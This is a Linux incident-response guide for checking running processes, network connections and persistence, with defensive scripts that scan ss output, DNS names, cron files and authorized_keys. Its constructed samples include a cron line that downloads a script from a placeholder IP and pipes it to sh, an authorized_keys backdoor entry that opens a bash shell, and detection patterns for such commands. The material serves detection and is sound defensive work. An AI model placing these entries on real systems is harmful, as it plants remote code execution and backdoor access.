3 Important Things

Investigating a Suspected Compromise on a Linux System

When responding to a suspected compromise on a Linux system, answering the following key questions systematically helps uncover malicious activities and guide further investigation.


1. Is There Malware Actively Running in the System?

Objective: Detect and analyze potentially malicious processes running on the system.

Steps to Identify Malicious Processes:

  1. List Active Processes:

    • Use ps or top to review running processes.

      ps aux | less

      Look for:

      • Processes with unusual names (e.g., xmr, random123).

      • Commands running from temporary or suspicious directories like /tmp, /dev/shm.

      • High CPU or memory usage by unexpected processes.

  2. Analyze the Process Tree:

    • Use pstree for a hierarchical view of processes.

      pstree -p

      Focus on:

      • Unexpected parent-child relationships (e.g., apache2 spawning bash).

  3. Investigate Executable Files:

    • Use lsof to list files opened by a specific process.

      lsof -p <PID>

      Check for:

      • Executables running from non-standard directories.

      • Open network sockets or files.

  4. Review Hidden Processes:

    • Hidden processes might evade standard tools. Cross-verify using:

      ps -elf | grep <process-name>

2. Is There Any Suspicious Internal or External Communication?

Objective: Detect unusual or unauthorized network activity indicative of C2 communication or data exfiltration.

Steps to Investigate Network Activity:

  1. Check Active Network Connections:

    • Use ss or netstat to list listening services and established connections. The -l option shows only listening sockets, so run both forms (add -p to see the owning process; run as root to see every socket):

      ss -tulnp
      ss -tunap

      Look for:

      • Connections to unknown external IPs.

      • Unusual listening ports (e.g., port 4444 used for reverse shells).

  2. Monitor Network Traffic:

    • Capture live traffic with tcpdump.

      tcpdump -i eth0

      Filter for suspicious activity:

      • DNS queries (port 53) for domains resembling C2 communication.

        tcpdump -i eth0 port 53

      • Large outbound transfers (packets over 1000 bytes sent by this host; replace <local-ip> with the host's own address):

        tcpdump -i eth0 -nn 'src host <local-ip> and greater 1000'

  3. Analyze Historical Network Activity:

    • Check system logs for past network connections.

      grep "connect" /var/log/syslog

      • Look for unknown IP addresses or repeated failed connection attempts.

  4. Inspect DNS Queries:

    • Review DNS query logs (if available) to identify suspicious domain resolutions.
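
The socket review in step 1 and the DNS review in step 4 are easier to repeat across many hosts when the judgement is written down as code. The script below is an added example, not code from the original page: it parses the output of `ss -tunap` (a constructed sample is embedded), flags listeners on a watch list of ports and established connections that leave from an ephemeral local port to a non-private peer, and then screens a list of queried names for labels that look machine-generated, which is what "domains resembling C2 communication" usually comes down to in practice. The watch list (4444 comes from the text; the rest are assumed) and the label-length thresholds are assumptions to tune.

```shell
#!/bin/sh
# Added example, not part of the original page: flag suspicious sockets from
# `ss -tunap` output and suspicious names from a DNS query list. Samples are
# constructed; WATCH_PORTS and the DNS thresholds are assumptions to tune.

# Constructed sample in the column layout printed by: ss -tunap
SAMPLE_SS='Netid State  Recv-Q Send-Q Local Address:Port     Peer Address:Port      Process
tcp   LISTEN 0      128    0.0.0.0:22             0.0.0.0:*              users:(("sshd",pid=812,fd=3))
tcp   LISTEN 0      5      0.0.0.0:4444           0.0.0.0:*              users:(("nc",pid=2500,fd=3))
tcp   ESTAB  0      0      10.0.0.5:22            10.0.0.9:51234         users:(("sshd",pid=1200,fd=4))
tcp   ESTAB  0      0      10.0.0.5:49152         203.0.113.7:8080       users:(("random123",pid=2400,fd=5))
tcp   ESTAB  0      0      10.0.0.5:443           198.51.100.20:36001    users:(("nginx",pid=900,fd=7))
udp   UNCONN 0      0      127.0.0.53%lo:53       0.0.0.0:*              users:(("systemd-resolve",pid=600,fd=12))'

# Constructed list of queried names, one per line (e.g. extracted from resolver logs)
SAMPLE_DNS='www.example.com
updates.example.org
a8f3c9d2e1b4f6a7c8d9e0f1a2b3c4d5e6f7a8b9.tunnel.example.net
7g.2h.9k.4m.1p.6q.x.example.net'

# Assumed watch list: 4444 is the port the text names; the others are common
# defaults for interactive listeners. Tune per environment.
WATCH_PORTS="4444 1337 31337"

# Reads `ss -tunap` output on stdin. Flags LISTEN sockets on watched ports and
# ESTAB sockets that leave from an ephemeral local port (>= 32768) to a peer
# outside RFC 1918 / loopback space, i.e. connections this host initiated.
flag_connections() {
    awk -v watch="${1:-$WATCH_PORTS}" '
    function ip_of(s,   a)   { a = s; sub(/:[^:]*$/, "", a); sub(/%.*/, "", a); return a }
    function port_of(s,   a) { a = s; sub(/^.*:/, "", a); return a }
    function is_private(ip) {
        return ip ~ /^(10\.|127\.|192\.168\.|172\.(1[6-9]|2[0-9]|3[01])\.)/ || ip == "0.0.0.0" || ip == "*" || ip ~ /^\[?::1/
    }
    NR == 1 { next }                       # header row
    {
        lip = ip_of($5); lport = port_of($5); rip = ip_of($6); rport = port_of($6)
        if ($2 == "LISTEN" && index(" " watch " ", " " lport " ") > 0)
            printf "watched-port-listener port=%s proc=%s\n", lport, $7
        if ($2 == "ESTAB" && !is_private(rip) && lport + 0 >= 32768)
            printf "outbound-to-public peer=%s:%s proc=%s\n", rip, rport, $7
    }'
}

# Reads one queried name per line. Flags a name when its longest label exceeds
# $1 characters (default 30) or it has more than $2 labels (default 6): both
# are typical of encoded data being carried in DNS rather than a human hostname.
flag_dns_names() {
    awk -v max_label="${1:-30}" -v max_labels="${2:-6}" '
    {
        n = split($0, lab, "."); longest = 0
        for (i = 1; i <= n; i++) if (length(lab[i]) > longest) longest = length(lab[i])
        if (longest > max_label || n > max_labels)
            printf "suspicious-name labels=%d longest=%d %s\n", n, longest, $0
    }'
}

# Demo on the constructed samples: flags the nc listener on 4444 and the
# random123 connection to 203.0.113.7, then the two encoded-looking names.
printf '%s\n' "$SAMPLE_SS" | flag_connections
printf '%s\n' "$SAMPLE_DNS" | flag_dns_names

# Live use on the suspect host (run as root so every socket shows its process):
#   ss -tunap | flag_connections
#   <your resolver or tcpdump 'port 53' extraction> | flag_dns_names
```

The inbound nginx connection from 198.51.100.20 is deliberately not flagged: its local port is the service port, so it is a client talking to the host. Outbound connections from ephemeral ports are the ones worth chasing first for C2 or exfiltration.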


3. Is There Any Persistence?

Objective: Detect mechanisms attackers use to maintain long-term access.

Steps to Identify Persistence Mechanisms:

  1. Check for Malicious Cron Jobs:

    • List current user's scheduled tasks.

      crontab -l

    • System-wide cron jobs:

      cat /etc/crontab
      ls -la /etc/cron.*

      Indicators:

      • Unknown scripts or commands scheduled to run periodically.

      • Scripts running from temporary locations.

  2. Inspect Startup Scripts:

    • Check for suspicious scripts or services configured to start on boot:

      ls -la /etc/init.d/
      ls -la /etc/systemd/system/

    • Review /etc/rc.local for manually added startup commands.

  3. Examine SSH Keys:

    • Verify authorized keys in ~/.ssh/authorized_keys.

      cat ~/.ssh/authorized_keys

      Look for:

      • Unauthorized public keys potentially used for backdoor access.

  4. Search for Recently Modified Files:

    • Identify files changed in the last few days.

      find / -type f -mtime -5 2>/dev/null

      Check:

      • Key system files like .bashrc, .profile, and system binaries for unauthorized modifications.
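
The cron review in step 1 and the SSH key review in step 3 both reduce to pattern checks over a handful of files, so they are worth scripting once and re-running on every host in scope. The script below is an added example, not code from the original page: it builds a constructed sample tree (crontab, a cron.d entry and an authorized_keys file with made-up key material), then greps the cron files for the indicators the text lists (commands under temporary paths, download-and-run pipelines, base64-decoded payloads) and flags authorized_keys entries that carry key options such as command= or whose comment is not on an expected list. The sample paths, the expected-comment list and the cron patterns are assumptions.

```shell
#!/bin/sh
# Added example, not part of the original page: persistence checks for cron
# entries and SSH authorized_keys. The sample tree and key material below are
# constructed; the indicator patterns and the expected-comment list are
# assumptions to adapt to the environment.

# Builds a throwaway directory that mimics the relevant part of a root filesystem
# and prints its path. Key blobs are made up and will not parse as real keys.
setup_sample() {
    dir=$(mktemp -d)
    mkdir -p "$dir/etc/cron.d" "$dir/home/alice/.ssh"
    cat > "$dir/etc/crontab" <<'EOF'
SHELL=/bin/sh
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/5 *   * * *   root    /dev/shm/.u/update.sh >/dev/null 2>&1
EOF
    cat > "$dir/etc/cron.d/backup" <<'EOF'
0 2 * * * root /usr/local/bin/backup.sh
* * * * * root curl -s http://203.0.113.7/x.sh | sh
EOF
    cat > "$dir/home/alice/.ssh/authorized_keys" <<'EOF'
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedKeyMaterial0001 alice@laptop
command="/bin/bash -i" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQConstructedKeyMaterial0002 support
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedKeyMaterial0003 unknown@external
EOF
    echo "$dir"
}

# $1 = filesystem root ("/" on a live host). Prints file:line:entry for every
# cron entry matching an indicator: a command under a temporary path, a
# download piped into a shell, or a base64-decoded payload.
scan_cron() {
    root=${1%/}
    pat='(/tmp|/var/tmp|/dev/shm)/|(curl|wget)[^|]*[|][[:space:]]*(ba)?sh|base64[[:space:]]+(-d|--decode)'
    grep -rHnE "$pat" "$root/etc/crontab" "$root/etc/cron.d" 2>/dev/null || true
}

# $1 = authorized_keys file, $2 = space-separated list of expected key comments.
# Flags entries that carry options (anything before the key type, e.g.
# command=, which can bind a key to an arbitrary command) and entries whose
# comment is not expected. A key with no comment is flagged as unknown too.
scan_authorized_keys() {
    awk -v allowed="$2" '
    /^[[:space:]]*#/ || NF == 0 { next }
    {
        reason = ""
        if ($1 !~ /^(ssh-|ecdsa-|sk-)/) reason = reason "key-options,"
        if (index(" " allowed " ", " " $NF " ") == 0) reason = reason "unknown-comment,"
        if (reason != "") printf "%s line=%d %s\n", reason, NR, $0
    }' "$1"
}

# Demo on the constructed tree: two cron hits (/dev/shm script, curl | sh) and
# two key hits (the command= entry and unknown@external).
root=$(setup_sample)
scan_cron "$root"
scan_authorized_keys "$root/home/alice/.ssh/authorized_keys" "alice@laptop"
rm -rf "${root:?}"

# Live use on the suspect host (run as root):
#   scan_cron /
#   for f in /root/.ssh/authorized_keys /home/*/.ssh/authorized_keys; do
#       [ -f "$f" ] && scan_authorized_keys "$f" "<expected comments>"
#   done
```

Pair the cron scan with per-user crontabs (`crontab -l -u <user>` for each account, or the spool under /var/spool/cron) since `/etc/crontab` and `/etc/cron.d` only cover system-wide jobs.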


Findings and Next Steps:

By following the outlined steps, you can determine:

  • Active Malware Presence: Identified through anomalous processes and suspicious executable files.

  • Suspicious Network Activity: Revealed by unusual external connections, DNS queries, and active network traffic.

  • Persistence Mechanisms: Found through malicious cron jobs, startup scripts, or unauthorized SSH keys.

Next Steps:

  1. Isolate the affected system to prevent further spread.

  2. Collect Evidence: Save logs, memory dumps, and identified malware samples.

  3. Remediate: Remove malicious processes, clean persistence mechanisms, and patch vulnerabilities.

  4. Monitor: Continuously monitor for signs of re-infection or additional compromises.
